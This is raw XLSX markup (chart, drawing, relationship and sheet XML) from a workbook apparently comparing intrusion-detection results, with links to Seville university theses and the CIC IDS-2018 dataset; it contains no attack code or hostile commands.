                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$N$10:$N$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1526285440"/>
        <c:axId val="1174888187"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="15262854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174888187"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1174888187"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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26285440"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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RS1</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Resultados'!$R$27:$R$28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Resultados'!$C$10:$F$10</cx:f>
      </cx:numDim>
      <cx:strDim type="cat">
        <cx:f>'(D) - Resultados'!$C$9:$F$9</cx:f>
      </cx:strDim>
    </cx:data>
  </cx:chartData>
  <cx:chart>
    <cx:plotArea>
      <cx:plotAreaRegion>
        <cx:series layoutId="waterfall" uniqueId="{B945A917-90E6-484B-BEC6-0C24960EC975}">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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart11.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart10.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart13.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart12.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15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart14.xml"/><Relationship Id="rId14" Type="http://schemas.microsoft.com/office/2014/relationships/chartEx" Target="../charts/chartEx1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart5.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart6.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart17.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47625</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</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47625</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</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47625</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</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47625</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</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2181225</xdr:colOff>
      <xdr:row>110</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="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xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="6" name="Chart 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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="7" name="Chart 7"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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>184</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="8" name="Chart 8"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="9" name="Chart 9"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="10" name="Chart 10"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="11" name="Chart 11"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="12" name="Chart 12"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23</xdr:col>
      <xdr:colOff>752475</xdr:colOff>
      <xdr:row>51</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5876925" cy="3752850"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="13" name="Chart 13"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xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <mc:AlternateContent>
      <mc:Choice Requires="cx1">
        <xdr:graphicFrame>
          <xdr:nvGraphicFramePr>
            <xdr:cNvPr id="14" name="Chart 14" title="Gráfico"/>
            <xdr:cNvGraphicFramePr/>
          </xdr:nvGraphicFramePr>
          <xdr:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </xdr:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.microsoft.com/office/drawing/2014/chartex">
              <cx:chart r:id="rId14"/>
            </a:graphicData>
          </a:graphic>
        </xdr:graphicFrame>
      </mc:Choice>
      <mc:Fallback>
        <xdr:sp>
          <xdr:nvSpPr>
            <xdr:cNvPr id="1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xdr:col>
      <xdr:colOff>304800</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="16" name="Chart 16"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xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>53</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="17" name="Chart 17"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16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>110</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="18" name="Chart 18"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16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="19" name="Chart 19"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16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="20" name="Chart 20"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16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>184</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="21" name="Chart 21" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId20"/>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ip/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.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idus.us.es/bitstream/handle/11441/159132/TFG4947_Garc%C3%ADaClavero.pdf?sequence=2&amp;isAllowed=y" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://idus.us.es/handle/11441/143609" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://biblus.us.es/bibing/proyectos/abreproy/94340/fichero/TFG-4340+GARC%C3%8DA+CORONADO%2C+ANDR%C3%89S.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.html"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69.25"/>
    <col customWidth="1" min="5" max="5" width="21.5"/>
  </cols>
  <sheetData>
    <row r="7" ht="19.5" customHeight="1">
      <c r="C7" s="1" t="s">
        <v>0</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>1</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>2</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>3</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="2" t="s">
        <v>5</v>
      </c>
      <c r="I7" s="2" t="s">
        <v>6</v>
      </c>
      <c r="J7" s="3" t="s">
        <v>7</v>
      </c>
      <c r="K7" s="4"/>
      <c r="L7" s="4"/>
      <c r="M7" s="4"/>
      <c r="N7" s="4"/>
      <c r="O7" s="4"/>
      <c r="P7" s="4"/>
    </row>
    <row r="8" ht="51.75" customHeight="1">
      <c r="C8" s="5" t="s">
        <v>8</v>
      </c>
      <c r="D8" s="6" t="s">
        <v>9</v>
      </c>
      <c r="E8" s="7" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="8">
        <v>45442.0</v>
      </c>
      <c r="G8" s="9" t="s">
        <v>11</v>
      </c>
      <c r="H8" s="10" t="s">
        <v>11</v>
      </c>
      <c r="I8" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J8" s="12" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="9" ht="51.75" customHeight="1">
      <c r="C9" s="5" t="s">
        <v>12</v>
      </c>
      <c r="D9" s="6" t="s">
        <v>13</v>
      </c>
      <c r="E9" s="7" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="8">
        <v>45442.0</v>
      </c>
      <c r="G9" s="13"/>
      <c r="H9" s="14"/>
      <c r="I9" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J9" s="12" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="10" ht="51.75" customHeight="1">
      <c r="C10" s="5" t="s">
        <v>14</v>
      </c>
      <c r="D10" s="6" t="s">
        <v>15</v>
      </c>
      <c r="E10" s="7">
        <v>10605.0</v>
      </c>
      <c r="F10" s="8">
        <v>45441.0</v>
      </c>
      <c r="G10" s="13"/>
      <c r="H10" s="10" t="s">
        <v>11</v>
      </c>
      <c r="I10" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J10" s="15"/>
    </row>
    <row r="11" ht="51.75" customHeight="1">
      <c r="C11" s="16" t="s">
        <v>16</v>
      </c>
      <c r="D11" s="17" t="s">
        <v>17</v>
      </c>
      <c r="E11" s="17" t="s">
        <v>10</v>
      </c>
      <c r="F11" s="18">
        <v>45441.0</v>
      </c>
      <c r="G11" s="19"/>
      <c r="H11" s="20"/>
      <c r="I11" s="21"/>
      <c r="J11" s="22" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12">
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
    </row>
    <row r="19">
      <c r="G19" s="24" t="s">
        <v>18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7" width="25.13"/>
    <col customWidth="1" min="8" max="8" width="32.13"/>
    <col customWidth="1" min="9" max="9" width="27.63"/>
    <col customWidth="1" min="10" max="12" width="41.75"/>
    <col customWidth="1" min="13" max="24" width="25.13"/>
    <col customWidth="1" min="25" max="25" width="26.88"/>
    <col customWidth="1" min="26" max="28" width="25.13"/>
    <col customWidth="1" min="29" max="29" width="25.88"/>
    <col customWidth="1" min="30" max="30" width="30.13"/>
    <col customWidth="1" min="31" max="31" width="35.38"/>
    <col customWidth="1" min="32" max="32" width="35.75"/>
    <col customWidth="1" min="33" max="38" width="35.38"/>
  </cols>
  <sheetData>
    <row r="2" ht="31.5" customHeight="1">
      <c r="B2" s="25"/>
      <c r="C2" s="25"/>
      <c r="D2" s="25"/>
      <c r="E2" s="25"/>
      <c r="F2" s="25"/>
      <c r="G2" s="25"/>
      <c r="H2" s="26"/>
      <c r="I2" s="26"/>
      <c r="J2" s="26"/>
      <c r="K2" s="26"/>
      <c r="L2" s="26"/>
      <c r="M2" s="27" t="s">
        <v>4</v>
      </c>
      <c r="N2" s="28"/>
      <c r="O2" s="28"/>
      <c r="P2" s="29"/>
      <c r="Q2" s="30" t="s">
        <v>5</v>
      </c>
      <c r="R2" s="28"/>
      <c r="S2" s="28"/>
      <c r="T2" s="29"/>
      <c r="U2" s="31" t="s">
        <v>6</v>
      </c>
      <c r="V2" s="28"/>
      <c r="W2" s="28"/>
      <c r="X2" s="29"/>
      <c r="Y2" s="32" t="s">
        <v>7</v>
      </c>
      <c r="Z2" s="28"/>
      <c r="AA2" s="28"/>
      <c r="AB2" s="29"/>
    </row>
    <row r="3" ht="30.0" customHeight="1">
      <c r="B3" s="33" t="s">
        <v>19</v>
      </c>
      <c r="C3" s="34" t="s">
        <v>20</v>
      </c>
      <c r="D3" s="35" t="s">
        <v>21</v>
      </c>
      <c r="E3" s="35" t="s">
        <v>22</v>
      </c>
      <c r="F3" s="35" t="s">
        <v>23</v>
      </c>
      <c r="G3" s="35" t="s">
        <v>24</v>
      </c>
      <c r="H3" s="35" t="s">
        <v>25</v>
      </c>
      <c r="I3" s="35" t="s">
        <v>26</v>
      </c>
      <c r="J3" s="36" t="s">
        <v>27</v>
      </c>
      <c r="K3" s="37" t="s">
        <v>28</v>
      </c>
      <c r="L3" s="37" t="s">
        <v>29</v>
      </c>
      <c r="M3" s="38" t="s">
        <v>30</v>
      </c>
      <c r="N3" s="38" t="s">
        <v>31</v>
      </c>
      <c r="O3" s="39" t="s">
        <v>32</v>
      </c>
      <c r="P3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="Q3" s="41" t="s">
        <v>34</v>
      </c>
      <c r="R3" s="42" t="s">
        <v>35</v>
      </c>
      <c r="S3" s="40" t="s">
        <v>32</v>
      </c>
      <c r="T3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="U3" s="41" t="s">
        <v>34</v>
      </c>
      <c r="V3" s="42" t="s">
        <v>35</v>
      </c>
      <c r="W3" s="40" t="s">
        <v>32</v>
      </c>
      <c r="X3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="Y3" s="41" t="s">
        <v>34</v>
      </c>
      <c r="Z3" s="42" t="s">
        <v>35</v>
      </c>
      <c r="AA3" s="40" t="s">
        <v>32</v>
      </c>
      <c r="AB3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="AC3" s="34" t="s">
        <v>36</v>
      </c>
      <c r="AD3" s="34" t="s">
        <v>37</v>
      </c>
      <c r="AE3" s="34" t="s">
        <v>38</v>
      </c>
      <c r="AF3" s="43" t="s">
        <v>39</v>
      </c>
      <c r="AG3" s="34" t="s">
        <v>40</v>
      </c>
      <c r="AH3" s="34" t="s">
        <v>41</v>
      </c>
      <c r="AI3" s="34" t="s">
        <v>42</v>
      </c>
      <c r="AJ3" s="34" t="s">
        <v>43</v>
      </c>
      <c r="AK3" s="34" t="s">
        <v>44</v>
      </c>
      <c r="AL3" s="43" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="4" ht="153.75" customHeight="1">
      <c r="B4" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C4" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="45" t="s">
        <v>47</v>
      </c>
      <c r="E4" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F4" s="45" t="s">
        <v>49</v>
      </c>
      <c r="G4" s="45" t="s">
        <v>50</v>
      </c>
      <c r="H4" s="46" t="s">
        <v>51</v>
      </c>
      <c r="I4" s="46" t="s">
        <v>52</v>
      </c>
      <c r="J4" s="46" t="s">
        <v>53</v>
      </c>
      <c r="K4" s="47">
        <v>1.0</v>
      </c>
      <c r="L4" s="47">
        <v>0.0</v>
      </c>
      <c r="M4" s="48">
        <v>1421.1418</v>
      </c>
      <c r="N4" s="48">
        <v>2.0</v>
      </c>
      <c r="O4" s="48">
        <v>4.0</v>
      </c>
      <c r="P4" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q4" s="50" t="s">
        <v>54</v>
      </c>
      <c r="R4" s="50">
        <v>15.0</v>
      </c>
      <c r="S4" s="50">
        <v>40.0</v>
      </c>
      <c r="T4" s="49" t="s">
        <v>55</v>
      </c>
      <c r="U4" s="51" t="s">
        <v>56</v>
      </c>
      <c r="V4" s="51">
        <v>22.0</v>
      </c>
      <c r="W4" s="51">
        <v>72.0</v>
      </c>
      <c r="X4" s="49" t="s">
        <v>55</v>
      </c>
      <c r="Y4" s="52" t="s">
        <v>57</v>
      </c>
      <c r="Z4" s="52">
        <v>31.0</v>
      </c>
      <c r="AA4" s="52">
        <v>96.0</v>
      </c>
      <c r="AB4" s="49" t="s">
        <v>58</v>
      </c>
      <c r="AC4" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD4" s="46" t="s">
        <v>60</v>
      </c>
      <c r="AE4" s="46" t="s">
        <v>61</v>
      </c>
      <c r="AF4" s="53" t="s">
        <v>62</v>
      </c>
      <c r="AG4" s="46" t="s">
        <v>63</v>
      </c>
      <c r="AH4" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI4" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ4" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK4" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL4" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="5" ht="153.75" customHeight="1">
      <c r="B5" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C5" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="55" t="s">
        <v>47</v>
      </c>
      <c r="E5" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F5" s="55" t="s">
        <v>65</v>
      </c>
      <c r="G5" s="45" t="s">
        <v>66</v>
      </c>
      <c r="H5" s="46" t="s">
        <v>67</v>
      </c>
      <c r="I5" s="46" t="s">
        <v>68</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>69</v>
      </c>
      <c r="K5" s="47">
        <v>1.0</v>
      </c>
      <c r="L5" s="47">
        <v>0.0</v>
      </c>
      <c r="M5" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N5" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O5" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P5" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T5" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U5" s="51" t="s">
        <v>70</v>
      </c>
      <c r="V5" s="51">
        <v>2.0</v>
      </c>
      <c r="W5" s="51">
        <v>72.0</v>
      </c>
      <c r="X5" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y5" s="52" t="s">
        <v>71</v>
      </c>
      <c r="Z5" s="52">
        <v>7.0</v>
      </c>
      <c r="AA5" s="52">
        <v>460.0</v>
      </c>
      <c r="AB5" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC5" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD5" s="46" t="s">
        <v>72</v>
      </c>
      <c r="AE5" s="56" t="s">
        <v>73</v>
      </c>
      <c r="AF5" s="53" t="s">
        <v>74</v>
      </c>
      <c r="AG5" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH5" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI5" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ5" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK5" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL5" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="6" ht="153.75" customHeight="1">
      <c r="B6" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C6" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D6" s="45" t="s">
        <v>47</v>
      </c>
      <c r="E6" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F6" s="45" t="s">
        <v>65</v>
      </c>
      <c r="G6" s="45" t="s">
        <v>66</v>
      </c>
      <c r="H6" s="46" t="s">
        <v>67</v>
      </c>
      <c r="I6" s="46" t="s">
        <v>76</v>
      </c>
      <c r="J6" s="46" t="s">
        <v>77</v>
      </c>
      <c r="K6" s="47">
        <v>1.0</v>
      </c>
      <c r="L6" s="47">
        <v>0.0</v>
      </c>
      <c r="M6" s="48" t="s">
        <v>78</v>
      </c>
      <c r="N6" s="48">
        <v>43.0</v>
      </c>
      <c r="O6" s="48">
        <v>62.0</v>
      </c>
      <c r="P6" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q6" s="50" t="s">
        <v>79</v>
      </c>
      <c r="R6" s="50">
        <v>57.0</v>
      </c>
      <c r="S6" s="50">
        <v>83.0</v>
      </c>
      <c r="T6" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U6" s="51" t="s">
        <v>80</v>
      </c>
      <c r="V6" s="51">
        <v>62.0</v>
      </c>
      <c r="W6" s="51">
        <v>4812.0</v>
      </c>
      <c r="X6" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y6" s="57" t="s">
        <v>81</v>
      </c>
      <c r="Z6" s="52">
        <v>74.0</v>
      </c>
      <c r="AA6" s="52">
        <v>4983.0</v>
      </c>
      <c r="AB6" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC6" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD6" s="46" t="s">
        <v>72</v>
      </c>
      <c r="AE6" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AF6" s="53" t="s">
        <v>84</v>
      </c>
      <c r="AG6" s="46" t="s">
        <v>85</v>
      </c>
      <c r="AH6" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI6" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ6" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK6" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL6" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="7" ht="153.75" customHeight="1">
      <c r="B7" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C7" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="55" t="s">
        <v>86</v>
      </c>
      <c r="E7" s="45" t="s">
        <v>87</v>
      </c>
      <c r="F7" s="55" t="s">
        <v>88</v>
      </c>
      <c r="G7" s="45" t="s">
        <v>89</v>
      </c>
      <c r="H7" s="46" t="s">
        <v>90</v>
      </c>
      <c r="I7" s="46" t="s">
        <v>68</v>
      </c>
      <c r="J7" s="46" t="s">
        <v>91</v>
      </c>
      <c r="K7" s="47">
        <v>1.0</v>
      </c>
      <c r="L7" s="47">
        <v>0.0</v>
      </c>
      <c r="M7" s="48">
        <v>255.0</v>
      </c>
      <c r="N7" s="48">
        <v>1.0</v>
      </c>
      <c r="O7" s="48">
        <v>1.0</v>
      </c>
      <c r="P7" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q7" s="59">
        <v>255.0</v>
      </c>
      <c r="R7" s="50">
        <v>1.0</v>
      </c>
      <c r="S7" s="50">
        <v>1.0</v>
      </c>
      <c r="T7" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U7" s="60">
        <v>255.0</v>
      </c>
      <c r="V7" s="51">
        <v>1.0</v>
      </c>
      <c r="W7" s="51">
        <v>1.0</v>
      </c>
      <c r="X7" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y7" s="52" t="s">
        <v>92</v>
      </c>
      <c r="Z7" s="52">
        <v>4.0</v>
      </c>
      <c r="AA7" s="52">
        <v>7.0</v>
      </c>
      <c r="AB7" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC7" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD7" s="46" t="s">
        <v>93</v>
      </c>
      <c r="AE7" s="46" t="s">
        <v>94</v>
      </c>
      <c r="AF7" s="53" t="s">
        <v>95</v>
      </c>
      <c r="AG7" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH7" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI7" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ7" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK7" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL7" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="8" ht="107.25" customHeight="1">
      <c r="B8" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C8" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="45" t="s">
        <v>96</v>
      </c>
      <c r="E8" s="45" t="s">
        <v>97</v>
      </c>
      <c r="F8" s="45" t="s">
        <v>98</v>
      </c>
      <c r="G8" s="61" t="s">
        <v>99</v>
      </c>
      <c r="H8" s="46" t="s">
        <v>100</v>
      </c>
      <c r="I8" s="46" t="s">
        <v>101</v>
      </c>
      <c r="J8" s="46" t="s">
        <v>102</v>
      </c>
      <c r="K8" s="47">
        <v>1.0</v>
      </c>
      <c r="L8" s="47">
        <v>0.0</v>
      </c>
      <c r="M8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P8" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q8" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R8" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S8" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T8" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U8" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V8" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W8" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X8" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y8" s="52" t="s">
        <v>103</v>
      </c>
      <c r="Z8" s="52">
        <v>3.0</v>
      </c>
      <c r="AA8" s="52">
        <v>12.0</v>
      </c>
      <c r="AB8" s="49" t="s">
        <v>104</v>
      </c>
      <c r="AC8" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AD8" s="62" t="s">
        <v>105</v>
      </c>
      <c r="AE8" s="46" t="s">
        <v>106</v>
      </c>
      <c r="AF8" s="53" t="s">
        <v>107</v>
      </c>
      <c r="AG8" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH8" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI8" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ8" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK8" s="47" t="s">
        <v>59</v>
      </c>
